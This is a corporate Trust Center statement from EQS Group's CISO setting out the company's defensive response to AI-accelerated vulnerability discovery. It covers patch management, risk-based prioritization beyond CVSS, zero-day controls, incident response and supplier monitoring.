EQS Trust Center

EQS is closely monitoring the evolution of AI-assisted vulnerability discovery and exploit development, including public reporting around Anthropic’s Claude Mythos Preview and related industry initiatives such as Project Glasswing. We do not treat this as a single-vendor or single-model issue. Our position is that “Mythos-class” capabilities are part of a broader shift: vulnerability discovery, exploit validation, patch-diff analysis, and attack automation are becoming faster, more accessible, and more scalable.

This development reinforces EQS’s existing security direction: controls must become faster, more evidence-based, and more integrated into software development, operations, supplier management, and incident response.

Scope of the Threat

EQS uses the term “Mythos-class” as shorthand for a broader class of AI-assisted vulnerability discovery and exploitation workflows. The risk is not dependent on an attacker having direct access to Anthropic’s Claude Mythos Preview or any other specific frontier model.

Material parts of these capabilities are already available today by combining existing AI models with coding agents, security tools, fuzzing, static analysis, exploit frameworks, vulnerability intelligence, patch-diff analysis, and human operator expertise. Well-orchestrated use of existing models can already accelerate vulnerability discovery, exploit validation, and remediation pressure.

For this reason, EQS treats Mythos as a signal of the direction and speed of change, not as the sole source of the threat. Our security response is model-agnostic and focused on reducing exposure, improving detection and remediation speed, strengthening Secure SDLC controls, and limiting blast radius.

CSA Alignment and Industry Collaboration

EQS aligns its approach with relevant industry guidance, including the Cloud Security Alliance publication The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program. This guidance reflects the same core assumption used by EQS: AI is changing the speed, scale, and economics of vulnerability discovery, and security programs must adapt beyond traditional patching and vulnerability-counting models.

EQS has been actively engaged in Cloud Security Alliance activities and has participated early in the discussion and definition of practical responses to AI-accelerated vulnerability risk. EQS is also listed in the CSA STAR Registry and holds the CSA Trusted Cloud Provider trustmark, reflecting our ongoing commitment to cloud security transparency, assurance, and community contribution.

This external collaboration complements EQS’s internal security work. We use CSA guidance as one input into our ongoing improvements across Secure SDLC, exposure management, third-party risk, security operations, incident response, and customer transparency.

Vulnerability and Patch Management

EQS maintains vulnerability management processes covering infrastructure, applications, dependencies, cloud services, containers, and supporting systems. Newly disclosed vulnerabilities are assessed using exploitability, exposure, reachability, affected services, affected data, compensating controls, dependency context, and evidence of active exploitation.

For critical vulnerabilities affecting customer-facing services, EQS applies expedited triage, emergency change handling, and prioritized remediation or containment. Where a fix cannot be safely deployed immediately, compensating controls may be applied to reduce exposure and blast radius while remediation proceeds.

EQS is continuously strengthening automated security checks, dependency visibility, software bill of materials coverage, reachability-based prioritization, and AI-assisted review in development workflows.

Vulnerability Prioritization and Use of CVSS

EQS does not rely on CVSS as the primary driver for vulnerability prioritization. CVSS may be considered as one contextual input where available, but it has never been a decisive factor in EQS vulnerability handling and is even less suitable as a standalone prioritization mechanism in the current threat environment.

Many SaaS-specific vulnerabilities do not have a CVE at all. CVEs are typically available for known components or publicly disclosed issues, but not for all application-specific, configuration-specific, or business-logic weaknesses. In addition, the fact that a component has a vulnerability does not automatically determine the actual risk for a service using it. Exposure, reachability, exploitability, compensating controls, and business impact are decisive.

EQS prioritizes vulnerabilities based on practical risk to EQS services and customers, including active exploitation, exploit availability, internet exposure, affected asset criticality, data sensitivity, dependency context, and operational impact. This prioritization can function independently of whether a CVE or CVSS score is available.

This approach also reflects the increasing strain on public vulnerability infrastructure. The CVE and NVD ecosystem is facing record vulnerability volumes, delayed or incomplete enrichment, and changing prioritization models. NIST has stated that CVE submissions increased by 263% between 2020 and 2025 and that NVD will no longer immediately enrich all CVEs or routinely provide separate NIST severity scores where a CVE Numbering Authority has already provided one. FIRST has similarly advised organizations to focus on vulnerabilities that pose the greatest risk to their specific environment, not only those with the highest CVSS scores.

Accordingly, EQS treats CVSS as a useful reference point, not as a substitute for exposure-based, exploitability-based, and business-impact-based security judgment.

Detection of Emerging Attack Patterns

EQS uses a combination of threat intelligence, vendor advisories, security monitoring, vulnerability feeds, automated tooling, and internal security analysis to identify emerging attack techniques. We explicitly consider AI-enabled attack acceleration in security planning, including higher vulnerability volumes, faster exploit development, and increased pressure on triage and remediation workflows.

Our security strategy is moving from traditional vulnerability counting toward exposure management: prioritizing what is exploitable, reachable, business-critical, or actively targeted.

Protection Against Zero-Day Exploits

No organization can guarantee prevention of all zero-day exploitation. EQS therefore applies layered controls designed to limit the likelihood and impact of unknown vulnerabilities. These include secure configuration baselines, least-privilege access, privileged-access protections, network and service segmentation, logging and monitoring, hardened deployment pipelines, application security testing, dependency controls, and containment procedures.

The goal is to reduce reachable attack surface, limit lateral movement, detect suspicious behavior early, and preserve the ability to contain or recover quickly.

Incident Response and Escalation

EQS maintains incident response processes with defined escalation paths, internal ownership, customer communication procedures, and management involvement for significant security events. For rapidly evolving vulnerability or exploitation scenarios, EQS can activate expedited assessment, containment, remediation, and communication workflows.

Customers are informed through the appropriate contractual and operational channels when a confirmed security issue materially affects the confidentiality, integrity, availability, or risk profile of services provided to them.

Ongoing Security Enhancements

EQS is continuously enhancing its security practices in light of AI-enabled threats. Current focus areas include:

• AI-aware Secure SDLC controls
• stronger vulnerability and dependency visibility
• faster triage and remediation workflows
• AI-assisted code and security review
• tabletop exercises for rapid-exploitation and multi-vulnerability scenarios
• improved security telemetry and evidence capture
• governance for AI systems, agents, connectors, and automation
• developer and security-team training for AI-era risks

This work is intended to improve defensive speed and governance quality without disclosing sensitive internal architecture, tooling configuration, or operational playbooks.

Third Parties and Subprocessors

EQS manages third-party and subprocessor risk through due diligence, contractual security expectations, supplier monitoring, compliance reviews, and review of relevant advisories or incidents.

EQS uses multiple sources and tools to monitor third-party risk. Where an increased risk signal is identified for a relevant supplier, EQS receives alerts and assesses the potential impact on services, data, and customers. These signals may include security advisories, vulnerability information, external risk indicators, compliance changes, potential “dark web” reports and data leakages, incident notifications, or other material changes in the supplier’s risk profile.

In addition to ongoing monitoring, EQS performs periodic compliance reviews of relevant suppliers, including an annual review cycle for applicable third parties and subprocessors. Where third-party technology forms part of EQS services, vulnerabilities are assessed according to exposure, exploitability, service impact, and available compensating controls.

EQS expects relevant suppliers to support timely vulnerability handling, security communication, and incident cooperation.

Transparency and Communication

EQS provides security transparency through the Trust Center, contractual documentation, and direct customer communication where appropriate. Public Trust Center materials describe our control approach at a level suitable for customers and auditors. For security reasons, EQS does not publicly disclose detailed detection logic, internal tooling configuration, supplier-specific exposure maps, vulnerability backlogs, or incident playbooks.

EQS will continue to monitor AI-enabled vulnerability discovery and update its security practices as the threat landscape evolves.

Relevant Public References

• Cloud Security Alliance: The “AI Vulnerability Storm”
• EQS Group in the CSA STAR Registry
• Anthropic Mythos Preview
• Anthropic Project Glasswing
• NIST NVD operations update
• FIRST 2026 Vulnerability Forecast

---

For security-related questions, customers may open a request against the InfoSec queue on our Support Center or contact EQS Information Security at infosec@eqs.com.

Dr. Marco Ermini
Chief Information Security Officer, EQS Group